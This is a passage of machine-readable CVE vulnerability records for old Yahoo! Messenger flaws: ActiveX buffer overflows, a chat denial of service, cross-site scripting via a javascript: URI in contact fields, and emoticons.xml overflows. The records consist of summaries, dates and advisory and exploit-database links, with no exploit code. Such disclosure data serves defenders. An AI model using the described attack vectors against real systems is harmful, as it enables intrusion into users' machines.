"url": "http://www.securitytracker.com/id?1018203"
},
{
"name": "2809",
"refsource": "SREASON",
"url": "http://securityreason.com/securityalert/2809"
},
{
"name": "http://research.eeye.com/html/advisories/published/AD20070608.html",
"refsource": "MISC",
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3147",
"datePublished": "2007-06-11T18:00:00",
"dateReserved": "2007-06-11T00:00:00",
"dateUpdated": "2024-08-07T14:05:28.302Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3148 (GCVE-0-2007-3148)
Vulnerability from nvd – Published: 2007-06-11 18:00 – Updated: 2024-08-07 14:05
VLAI?
Summary
Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:05:29.296Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "4043",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/4043"
},
{
"name": "yahoo-webcam-viewer-bo(34759)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34759"
},
{
"name": "37081",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/37081"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "24355",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24355"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "20070607 2nd Yahoo 0day ActiveX Exploit",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html"
},
{
"name": "24341",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018203"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
},
{
"name": "VU#932217",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/932217"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-06-07T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "4043",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/4043"
},
{
"name": "yahoo-webcam-viewer-bo(34759)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34759"
},
{
"name": "37081",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/37081"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "24355",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24355"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "20070607 2nd Yahoo 0day ActiveX Exploit",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html"
},
{
"name": "24341",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018203"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
},
{
"name": "VU#932217",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/932217"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3148",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "4043",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/4043"
},
{
"name": "yahoo-webcam-viewer-bo(34759)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34759"
},
{
"name": "37081",
"refsource": "OSVDB",
"url": "http://osvdb.org/37081"
},
{
"name": "http://research.eeye.com/html/advisories/upcoming/20070605.html",
"refsource": "MISC",
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "24355",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24355"
},
{
"name": "http://messenger.yahoo.com/security_update.php?id=060707",
"refsource": "CONFIRM",
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "20070607 2nd Yahoo 0day ActiveX Exploit",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html"
},
{
"name": "24341",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1018203"
},
{
"name": "http://research.eeye.com/html/advisories/published/AD20070608.html",
"refsource": "MISC",
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
},
{
"name": "VU#932217",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/932217"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3148",
"datePublished": "2007-06-11T18:00:00",
"dateReserved": "2007-06-11T00:00:00",
"dateUpdated": "2024-08-07T14:05:29.296Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-1680 (GCVE-0-2007-1680)
Vulnerability from nvd – Published: 2007-04-06 01:00 – Updated: 2024-08-07 13:06
VLAI?
Summary
Stack-based buffer overflow in the createAndJoinConference function in the AudioConf ActiveX control (yacscom.dll) in Yahoo! Messenger before 20070313 allows remote attackers to execute arbitrary code via long (1) socksHostname and (2) hostname properties.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T13:06:26.204Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "yahoo-yahooaudioconf-activex-bo(33408)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/33408"
},
{
"name": "23291",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/23291"
},
{
"name": "24742",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/24742"
},
{
"name": "VU#388377",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/388377"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html"
},
{
"name": "2523",
"tags": [
"third-party-advisory",
"x_refsource_SREASON",
"x_transferred"
],
"url": "http://securityreason.com/securityalert/2523"
},
{
"name": "ADV-2007-1219",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/1219"
},
{
"name": "34319",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/34319"
},
{
"name": "1017867",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1017867"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://messenger.yahoo.com/security_update.php?id=031207"
},
{
"name": "20070403 ZDI-07-012: Yahoo! Messenger AudioConf ActiveX Control Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/464607/100/0/threaded"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-04-02T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in the createAndJoinConference function in the AudioConf ActiveX control (yacscom.dll) in Yahoo! Messenger before 20070313 allows remote attackers to execute arbitrary code via long (1) socksHostname and (2) hostname properties."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "yahoo-yahooaudioconf-activex-bo(33408)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/33408"
},
{
"name": "23291",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/23291"
},
{
"name": "24742",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/24742"
},
{
"name": "VU#388377",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/388377"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html"
},
{
"name": "2523",
"tags": [
"third-party-advisory",
"x_refsource_SREASON"
],
"url": "http://securityreason.com/securityalert/2523"
},
{
"name": "ADV-2007-1219",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/1219"
},
{
"name": "34319",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/34319"
},
{
"name": "1017867",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1017867"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://messenger.yahoo.com/security_update.php?id=031207"
},
{
"name": "20070403 ZDI-07-012: Yahoo! Messenger AudioConf ActiveX Control Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/464607/100/0/threaded"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-1680",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Stack-based buffer overflow in the createAndJoinConference function in the AudioConf ActiveX control (yacscom.dll) in Yahoo! Messenger before 20070313 allows remote attackers to execute arbitrary code via long (1) socksHostname and (2) hostname properties."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "yahoo-yahooaudioconf-activex-bo(33408)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/33408"
},
{
"name": "23291",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/23291"
},
{
"name": "24742",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/24742"
},
{
"name": "VU#388377",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/388377"
},
{
"name": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html",
"refsource": "MISC",
"url": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html"
},
{
"name": "2523",
"refsource": "SREASON",
"url": "http://securityreason.com/securityalert/2523"
},
{
"name": "ADV-2007-1219",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/1219"
},
{
"name": "34319",
"refsource": "OSVDB",
"url": "http://osvdb.org/34319"
},
{
"name": "1017867",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1017867"
},
{
"name": "http://messenger.yahoo.com/security_update.php?id=031207",
"refsource": "CONFIRM",
"url": "http://messenger.yahoo.com/security_update.php?id=031207"
},
{
"name": "20070403 ZDI-07-012: Yahoo! Messenger AudioConf ActiveX Control Buffer Overflow",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/464607/100/0/threaded"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-1680",
"datePublished": "2007-04-06T01:00:00",
"dateReserved": "2007-03-26T00:00:00",
"dateUpdated": "2024-08-07T13:06:26.204Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-0868 (GCVE-0-2007-0868)
Vulnerability from nvd – Published: 2007-02-09 19:00 – Updated: 2024-08-07 12:34
VLAI?
Summary
Unspecified vulnerability in the Chat Room functionality in Yahoo! Messenger 8.1.0.239 and earlier allows remote attackers to cause a denial of service via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T12:34:21.130Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "22407",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/22407"
},
{
"name": "34696",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/34696"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-02-05T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in the Chat Room functionality in Yahoo! Messenger 8.1.0.239 and earlier allows remote attackers to cause a denial of service via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2008-11-15T10:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "22407",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/22407"
},
{
"name": "34696",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/34696"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-0868",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Unspecified vulnerability in the Chat Room functionality in Yahoo! Messenger 8.1.0.239 and earlier allows remote attackers to cause a denial of service via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "22407",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/22407"
},
{
"name": "34696",
"refsource": "OSVDB",
"url": "http://osvdb.org/34696"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-0868",
"datePublished": "2007-02-09T19:00:00",
"dateReserved": "2007-02-09T00:00:00",
"dateUpdated": "2024-08-07T12:34:21.130Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-0768 (GCVE-0-2007-0768)
Vulnerability from nvd – Published: 2007-02-06 02:00 – Updated: 2024-08-07 12:34
VLAI?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields. NOTE: some of these details are obtained from third party information.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T12:34:19.794Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "22269",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/22269"
},
{
"name": "20070126 Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/458225/100/0/threaded"
},
{
"name": "20070127 RE: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/458305/100/0/threaded"
},
{
"name": "23928",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/23928"
},
{
"name": "31674",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/31674"
},
{
"name": "20070127 Re: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/458494/100/0/threaded"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-01-26T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields. NOTE: some of these details are obtained from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "22269",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/22269"
},
{
"name": "20070126 Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/458225/100/0/threaded"
},
{
"name": "20070127 RE: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/458305/100/0/threaded"
},
{
"name": "23928",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/23928"
},
{
"name": "31674",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/31674"
},
{
"name": "20070127 Re: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/458494/100/0/threaded"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-0768",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields. NOTE: some of these details are obtained from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "22269",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/22269"
},
{
"name": "20070126 Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/458225/100/0/threaded"
},
{
"name": "20070127 RE: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/458305/100/0/threaded"
},
{
"name": "23928",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/23928"
},
{
"name": "31674",
"refsource": "OSVDB",
"url": "http://osvdb.org/31674"
},
{
"name": "20070127 Re: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/458494/100/0/threaded"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-0768",
"datePublished": "2007-02-06T02:00:00",
"dateReserved": "2007-02-05T00:00:00",
"dateUpdated": "2024-08-07T12:34:19.794Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2014-7216 (GCVE-0-2014-7216)
Vulnerability from cvelistv5 – Published: 2015-09-11 20:00 – Updated: 2024-08-06 12:40
VLAI?
Summary
Multiple stack-based buffer overflows in Yahoo! Messenger 11.5.0.228 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) shortcut or (2) title keys in an emoticons.xml file.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T12:40:19.202Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://hackerone.com/reports/10767"
},
{
"name": "20150903 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/536390/100/0/threaded"
},
{
"name": "1033544",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1033544"
},
{
"name": "20150907 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2015/Sep/24"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2015-09-03T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple stack-based buffer overflows in Yahoo! Messenger 11.5.0.228 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) shortcut or (2) title keys in an emoticons.xml file."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-09T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/"
},
